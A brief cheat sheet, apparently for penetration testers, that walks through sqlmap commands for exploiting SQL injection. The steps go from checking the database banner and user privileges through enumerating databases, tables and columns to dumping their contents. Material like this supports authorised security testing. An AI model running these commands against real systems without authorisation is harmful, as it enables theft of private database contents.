Step 0: Test injection by hand first.
This is good practice to horn someone own skill.
Plus, sqlmap is just a tool and could use a very inefficient exploitation strategy if going fully automatic without prior manual testing. In addition, sqlmap is a dangerous tool that could crash the remote service if not used correctly.
Step 1: Extract the database banner
sqlmap -u <target> --banner <other_options>Step 2: List users of the database
sqlmap -u <target> --users <other_options>Step 3: Check if database user is administrator
sqlmap -u <target> --is-dba <other_options>Step 4: List available databases
sqlmap -u <target> --dbs <other_options>Step 5: List tables of selected database
sqlmap -u <target> -D <database> --tables <other_options>Step 6: List columns of one or more tables
sqlmap -u <target> -D <database> -T <table,table> --columns <other_options>Step 7: Dump columns
sqlmap -u <target> -D <database> -T <table> -C <column,column> --dump <other_options>